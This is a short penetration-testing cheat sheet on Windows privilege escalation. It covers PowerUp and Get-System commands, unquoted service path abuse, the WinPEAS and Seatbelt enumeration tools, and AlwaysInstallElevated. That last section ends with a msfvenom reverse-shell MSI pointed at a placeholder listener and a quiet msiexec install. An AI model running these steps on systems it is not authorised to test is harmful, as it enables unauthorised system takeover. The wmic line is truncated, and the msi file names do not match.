Privilege Escalation

PowerShellMafia

Try to use dev brach always. PowerView has some cool functions to use.

powershell.exe -c "Import-Module C:\Users\Public\PowerUp.ps1; Invoke-AllChecks"
powershell.exe -c "Import-Module C:\Users\Public\Get-System.ps1; Get-System"

Unquoted Service Paths

Let's say we have a system path like below.

C:\Program Files\IObit\Advanced SystemCare\ASCService.exe

Windows will first try execute it like below in the following order

c:\program.exe
C:\Program Files\IObit\Advanced.exe
C:\Program Files\IObit\Advanced SystemCare\ASCService.exe

If we can plant the exe in one of the paths below we can elevate privileges

Please note that we need to either have the ability to restart the machine or restart the service. Otherwise it's useless kinda.

Enumerating unquoted service paths

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v

WinPeas

It is a great privilege escalation enumeration tool. Find the releases below and simply execute the binary.

https://github.com/carlospolop/PEASS-ng/releases

.\winPEASx64_ofs.exe notcolor quiet

Seatbelt

https://github.com/GhostPack/Seatbelt

Always Install Elevated

https://www.hackingarticles.in/windows-privilege-escalation-alwaysinstallelevated/#:~:text=For%20this%20purpose%2C%20the%20AlwaysInstallElevated,any%20program%20on%20the%20system.

Detecting if the OS is vulnerable,

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

If always install elevated is enabled, queries above should return 1.

Exploiting it is pretty simple. Generate an msi payload,

msfvenom -p windows/shell/reverse_tcp lhost=1.3.3.7 lport=9001 -f msi > shell.msi

Execute it,

msiexec /quiet /qn /i 1.msi

PreviousRecon - Initial Access NextEnable Privs

Last updated 3 years ago